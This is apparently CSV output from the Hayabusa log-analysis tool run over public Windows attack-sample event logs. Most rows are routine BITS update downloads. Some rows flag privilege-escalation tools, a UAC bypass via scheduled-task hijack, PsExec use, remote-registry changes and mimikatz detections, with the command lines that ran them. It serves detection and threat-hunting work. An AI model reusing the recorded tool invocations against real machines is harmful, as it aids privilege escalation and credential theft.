http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool 
Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: 
